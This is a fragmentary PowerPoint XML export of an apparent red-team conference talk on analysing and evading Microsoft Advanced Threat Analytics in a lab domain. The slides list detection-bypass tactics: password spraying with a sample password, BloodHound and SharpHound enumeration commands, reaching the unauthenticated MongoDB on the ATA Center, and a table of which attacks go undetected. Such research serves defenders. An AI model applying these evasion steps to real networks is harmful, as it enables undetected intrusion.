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309" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="314" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="278" r:id="rId17"/>
    <p:sldId id="310" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="311" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="269" r:id="rId22"/>
    <p:sldId id="275" r:id="rId23"/>
    <p:sldId id="276" r:id="rId24"/>
    <p:sldId id="272" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="267" r:id="rId27"/>
    <p:sldId id="273" r:id="rId28"/>
    <p:sldId id="313" r:id="rId29"/>
    <p:sldId id="274" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="281" r:id="rId33"/>
    <p:sldId id="285" r:id="rId34"/>
    <p:sldId id="282" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="284" r:id="rId37"/>
    <p:sldId id="286" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="291" r:id="rId41"/>
    <p:sldId id="290" r:id="rId42"/>
    <p:sldId id="289" r:id="rId43"/>
    <p:sldId id="295" r:id="rId44"/>
    <p:sldId id="294" r:id="rId45"/>
    <p:sldId id="293" r:id="rId46"/>
    <p:sldId id="308" r:id="rId47"/>
    <p:sldId id="292" r:id="rId48"/>
    <p:sldId id="299" r:id="rId49"/>
    <p:sldId id="298" r:id="rId50"/>
    <p:sldId id="297" r:id="rId51"/>
    <p:sldId id="300" r:id="rId52"/>
    <p:sldId id="301" r:id="rId53"/>
    <p:sldId id="296" r:id="rId54"/>
    <p:sldId id="303" r:id="rId55"/>
    <p:sldId id="304" r:id="rId56"/>
    <p:sldId id="305" r:id="rId57"/>
    <p:sldId id="302" r:id="rId58"/>
    <p:sldId id="307" r:id="rId59"/>
    <p:sldId id="30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0" autoAdjust="0"/>
    <p:restoredTop sz="84232" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="13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2FD48-86CA-4912-B566-C2F88DF5040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8D80-A339-44E9-8D74-CAD5558E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4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0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1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1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2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5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6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6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1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6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75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7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4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9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2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1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99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5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54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6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6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36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01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64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69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8D80-A339-44E9-8D74-CAD5558ED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F9A3-3187-4E7F-A468-94FFD4DA8825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52B7-6BBD-4052-B346-D6D9BCCAFD69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C67-AF72-4D82-8432-E98C0F4B2BDF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19C3-55DF-4466-A1EA-1A6FA25D6470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B3A-0F7D-4864-BF2F-0BA4961B0AB1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9265-13F3-4BC6-A01E-0C58157039CD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38A-7BB8-4B64-942B-43EDD9D42290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73BF-A3B2-4F4B-8E94-4A3BB2C39577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0530-5F4B-43C5-AE4D-F17FE01C7CC3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5D67-2165-4EFD-829D-D232E513465C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B641-07B6-4E6A-92FB-E3BAE7889C43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B68E-D55B-4D88-8E9F-DCEEBDB87D53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4/9/1/491394D1-3F28-4261-ABC6-C836A301290E/ATA1.9.is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long/DetectionLa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Advanced-Threat-Analytics-8b0a86b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rcolancini.it/2018/blog-hacker-playbook-mindmap/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3nt4/Invoke-SocksProxy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dvanced-threat-analytics/what-is-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Advanced Threat Analytics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История анализа и борьбы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Create LAB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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t> х </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Win 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>DC</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>х </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Win2012 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>ATA Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>х </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Win2012 – ATA Gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t> х </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> Client</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>1 х </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Win7 Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>1 x Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> Server (Threat-Hunt App)</a:t>
            </a:r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3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Advanced Threat Analysis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Download and install ATA Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://download.microsoft.com/download/4/9/1/491394D1-3F28-4261-ABC6-C836A301290E/ATA1.9.iso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>90-day trial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Automation install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l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Analysis – MS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1" y="1196120"/>
            <a:ext cx="11738465" cy="545493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Itself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5" y="1033154"/>
            <a:ext cx="10834417" cy="568112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- Itself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ATA Center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Win2012/2016 Server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TCP/443 listen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Lightweight Client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DC service -&gt; ATA Center TCP/443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WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> WEF / SPAN / RSPAN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No AD Scheme modification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Center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Microsoft.Tri.Center.exe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c:\program files\Microsoft Advanced Thread Analytics\Gateway\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Lightweight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Microsoft.Tri.Gateway.exe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c:\program files\Microsoft Advanced Thread Analytics\Gateway\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9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220819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ATA Gateway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WEF (Windows Event Forwarding)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MS tell PUSH (Server forwards to ATA GW)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844" y="3581484"/>
            <a:ext cx="11116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HKLM\SOFTWARE\Policies\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EventLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EventForwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SubscriptionManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\NN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844" y="4951882"/>
            <a:ext cx="10494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Server=http://ata-gw.winlab.local:5985/wsman/SubscriptionManager/WEC,Refresh=10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7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How to Detect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0" y="1033154"/>
            <a:ext cx="11531569" cy="34919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" y="1833723"/>
            <a:ext cx="11456163" cy="494164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53" y="333066"/>
            <a:ext cx="9396666" cy="60560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8" y="1220724"/>
            <a:ext cx="11796355" cy="54145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/>
              <a:t>微軟</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0"/>
              <a:t>高級威脅分析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7177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分析和繞過</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2" y="148588"/>
            <a:ext cx="2301682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20" y="148588"/>
            <a:ext cx="9081317" cy="653356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8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.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> Web 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TCP/443 Console/API GW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WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>SignalR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NTLM / Kerberos Console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Auth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Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> for ATA GW/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>LightGW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(need ATA Center cert key to MITM GW )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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460" y="1203223"/>
            <a:ext cx="11004468" cy="1868223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ATA Center local admin = ATA admin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No Monitoring for ATA Center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MongoDB TCP/localhost:27017 No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty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  <a:p>
            <a:pPr algn="l"/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2677" y="3241515"/>
            <a:ext cx="9706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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to ATA Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PortProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 37017 -&gt; localhost:27017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MongoClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; ATA Center:37017 (no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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Center Itself - Tampering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8" y="1033154"/>
            <a:ext cx="11854643" cy="507456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MS KILL CHAIN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1" y="1196120"/>
            <a:ext cx="11738465" cy="545493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452881"/>
            <a:ext cx="11007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Advanced Threat Analytics Attack Simulation Playbook for ATA 1.8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199" y="2749771"/>
            <a:ext cx="11242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https://gallery.technet.microsoft.com/Advanced-Threat-Analytics-8b0a86bc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3" y="3445023"/>
            <a:ext cx="4135277" cy="310145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Our own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1033154"/>
            <a:ext cx="3589094" cy="5733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48" y="225054"/>
            <a:ext cx="4326108" cy="65414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37356" y="2613465"/>
            <a:ext cx="5183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https://www.marcolancini.it/2018/blog-hacker-playbook-mindmap/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633363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own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KillChain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08587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Reconnaissance, Enumeration  (no creds)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Getting credentials (any user, svc, admin,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Reconnaissance (with creds)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Assets Access, remote execution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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> escalation, lateral movement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Covering tracks, persistence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algn="l"/>
            <a:endParaRPr lang="en-US" sz="4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 rot="19879326">
            <a:off x="6266692" y="4392989"/>
            <a:ext cx="6384439" cy="8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КРЫМНАШ</a:t>
            </a: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5918" y="1274002"/>
            <a:ext cx="9151917" cy="311042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 ATA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КРЫМНАШ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Recon,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015" y="1203223"/>
            <a:ext cx="11980985" cy="793729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dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0" err="1"/>
              <a:t>Крымнаш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> : sniff, spoof, replay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>responder, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>ntlmXrelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>etc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4" y="1996952"/>
            <a:ext cx="11571015" cy="463831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3E28A77-068C-3545-8187-C222139677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62000" y="508000"/>
            <a:ext cx="8636000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About me</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="40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DA6A61F-7AC4-094A-B86A-5BA517C99D06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016132" y="1693687"/>
            <a:ext cx="10207680" cy="402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Red-teamer/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> / researcher in M-13 Ltd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>About 6 years in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Infosecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Offensive / defensive projects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>APT / Red-Teams researching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7FA608-3AD7-4814-BAFD-10494B6B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83" y="4693157"/>
            <a:ext cx="2715274" cy="159664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Recon,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MS ATA: Session Enumeration</a:t>
            </a:r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MS ATA: User enumeration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Bypass:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>No Enumeration at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Use sniffing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creds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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0" err="1"/>
              <a:t>Крымнаш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>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Sniff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Relay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Bruting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Fishing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Services exploitation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etc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29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Getting creds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2" y="1033154"/>
            <a:ext cx="11340174" cy="3164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69" y="2891045"/>
            <a:ext cx="10962163" cy="336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1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Getting creds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225508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Bypass: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Direct brute – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>отстой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>,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ATA check logons for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> account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95844" y="3458309"/>
            <a:ext cx="11004468" cy="144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Megafon2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> -&gt; against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> accounts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Megafon2019!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> -&gt; against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> accounts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95844" y="5052647"/>
            <a:ext cx="11004468" cy="1441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Megafon2019 -&gt; against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.16.2.10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Megafon2019! -&gt; against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.16.2.12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2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 with creds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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>КРЫМНАШ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>AD recon: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ldapsearch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BloodHound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Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>AD Dump: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ldpapdump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ADExplorer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2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 with creds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6" y="1033154"/>
            <a:ext cx="7288564" cy="546143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945610" y="1625696"/>
            <a:ext cx="3626389" cy="88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Detect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17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Recon with creds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690648" cy="5525824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solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ldapsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> dump - No detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adexplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> dump - No detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./bloodhound.py -u user1 -p Password1 -dc dc1.winlab.local  -v -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WINLAB.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -ns 172.16.2.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>No detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\shardhound.exe -c All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Detected: SMB session enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\shardhound.exe -c default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Detected: SMB session enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\shardhound.exe -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>No Detection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1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Access, Code Execution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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0" err="1"/>
              <a:t>Крымнаш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Killchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>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Bruting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Kerberoasting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Pass-the-Hash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SMBRelay</a:t>
            </a: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Service Exploitation (SQL, Web,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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bruting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – detected</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass-the-hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – undetected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Pass-the-ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMBRelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> – undetected</a:t>
            </a:r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7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bruiting, pass-the-hash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4"/>
            <a:ext cx="11750482" cy="54739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60" y="3494609"/>
            <a:ext cx="10962163" cy="336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7"/>
            <a:ext cx="10414051" cy="8947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time ago in a galaxy far, far away…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Pentest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>RedTeam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U can read an IT stuff and admin emails</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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No customer approvals</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
